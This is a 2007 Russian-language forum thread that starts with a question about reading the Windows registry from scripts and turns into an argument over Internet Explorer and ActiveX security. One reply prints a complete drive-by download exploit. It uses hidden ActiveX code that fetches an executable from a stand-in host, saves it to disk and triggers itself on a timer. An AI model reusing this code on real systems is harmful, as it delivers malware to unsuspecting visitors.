| |
|
|
| | Пришлите плиз хоты-бы один исходник/пример как прочесть ключь реестра, и использовать его значения в скриптах! | |
| |
|
|
| |
|
|
| |
для: shturman
(23.07.2007 в 10:07)
| | | Тут скорее всего ActiveX только подойдет, и то я не уверен :) | |
| |
|
|
| |
|
|
| |
для: shturman
(23.07.2007 в 10:07)
| | | юзайте куки | |
| |
|
|
| |
|
|
| |
для: shturman
(23.07.2007 в 10:07)
| | | Только ActiveX, Windows Script Host. Например, используя WSH, можно с помощью JS или VBS работать с реестром. Вот как может выглядеть это с помощью JS:
//Пример работы с реестром на JScript
var WSHShell = WScript.CreateObject("WScript.Shell");
WSHShell.Popup("Создаем раздел");
WSHShell.RegWrite("HKCU\\MyRegKey\\", "Primer");
WSHShell.Popup("Создаем строковый параметр");
WSHShell.RegWrite("HKCU\\MyRegKey\\String", 1);
WSHShell.Popup("Создаем параметр DWORD");
WSHShell.RegWrite("HKCU\\MyRegKey\\DWORD", 2, "REG_DWORD");
WSHShell.Popup("Создаем двоичный параметр");
WSHShell.RegWrite("HKCU\\MyRegKey\\Binary", 3, "REG_BINARY");
WSHShell.Popup("Удаляем все параметры");
WSHShell.RegDelete("HKCU\\MyRegKey\\String");
WSHShell.RegDelete("HKCU\\MyRegKey\\DWORD");
WSHShell.RegDelete("HKCU\\MyRegKey\\Binary");
WSHShell.Popup("Удаляем раздел");
WSHShell.RegDelete("HKCU\\MyRegKey\\");
|
Работать будет естественно только на Windows. | |
| |
|
|
| |
|
|
| |
для: sim5
(23.07.2007 в 11:49)
| | | Не просто только в Windows, а только в IE! И вообще то что ты описал это почти эксплойт. По-моему нормальный антивирус на это ругаться будет... Или IE разрешение на это дело спросит. Обязательно должен спросить. Собственно в этом и кроется "дырявость" IE. Если он плохо настроен спомощью него можно хоть в реестре ковыряться хоть трояны заливать без вопросов. | |
| |
|
|
| |
|
|
| |
для: ToNic
(25.07.2007 в 21:39)
| | | То, что я написал - это давно известное и широко описанное. Что касется IE, то он здесь просто сбоку, так как WSH - это системный ресурс и обращение к нему может быть не обязательно из браузера. Ну и последнее. Чтобы это работало, то система должна поддреживать этот ресурс - он должен быть установлен в системе. | |
| |
|
|
| |
|
|
| |
для: sim5
(26.07.2007 в 04:31)
| | | >То, что я написал - это давно известное и широко описанное.
Ну и че? Я те говорю что если ты заходишь на сайт порнуху полистать, а этот сайт редактирует твой реестр без твоего ведома, загружает тебе произвольны файлы по произвольным адресам, то это не нормально, ты со мной не согласен?
Вот тебе еще широкоизвестный и давно описанный трюк:
<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
// Создаем объект на основе Microsoft.XMLHTTP
x.Open("GET", "http://www.example.com/1.exe", 0);
x.Send();
// Генерим и отправляем GET-запрос
var s = new ActiveXObject("ADODB.Stream");
// Создаем второй объект - ADODB.Stream
s.Mode = 3;
s.Type = 1;
s.Open();
// Выставляем моды
s.Write(x.responseBody);
// Записываем в поток ответ на GET-запрос
s.SaveToFile("C:\\example.exe", 2);
// Сохраняем это в файл
</textarea>
<script language="javascript">
function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0; i<lines.length; i++) {
line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");
// Меняем символы про помощи регулярных выражений
if (line != '') {
result += line +'\\r\\n';
}
// Строка не пустая - добавляем конец строки
}
return result;
// Возвращаем результат
}
function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
// Подготовили урл для скачки и заливки файлов
window.open(myURL, "_media")
// Открываем этот урл
}
setTimeout("doit()", 5000);
// Вызываем функцию doit через 5 секунд
</script>
|
И таких вещей дохрена, я тебе скажу, и еслиб не антивирус, эта штука работала бы и преспокойно заливала бы любые файлы куда угодно. А с помощью WSH можно залитый троян еще и в автозапуск запихать.
>Что касется IE, то он здесь просто сбоку, так как WSH - это системный ресурс и обращение к нему может быть не обязательно из браузера.
Я те говорю что IE это единственный браузер, в котором JS может использовать ActiveX. Любые ActiveX. Больше никакой браузер так не может. Вот причем тут IE.
>Чтобы это работало, то система должна поддреживать этот ресурс - он должен быть установлен в системе.
Да, давай, прочти мне лекцию про то что такое классы, объекты и компоненты. | |
| |
|
|
| |
|
|
| |
для: sim5
(26.07.2007 в 04:31)
| | | >Да, давай, прочти мне лекцию про то что такое классы, объекты и компоненты.
Ни лекций, не нотаций и нравоучений писать не собираюсь, не вам никому либо.
Со всеми притензими по поводу WHS это не ко мне, а к Microsoft.
Что касается IE, прочтите свой первый пост.
И не думайте что мой комп оголенный, приведенную вами лабуду он уж никак не запустит! | |
| |
|
|
| |
|
|
| |
для: sim5
(26.07.2007 в 10:34)
| | | Так я притензий не предъявляю, к чему предъявлять притензии то? С WSH все нормально, просто IE надо правильно настраивать. А лабуда лишь для примера, она давно не работает ибо попала уже во все вирусные базы. Но этих лабуд очень много и все время появляются новые. | |
| |
|
|
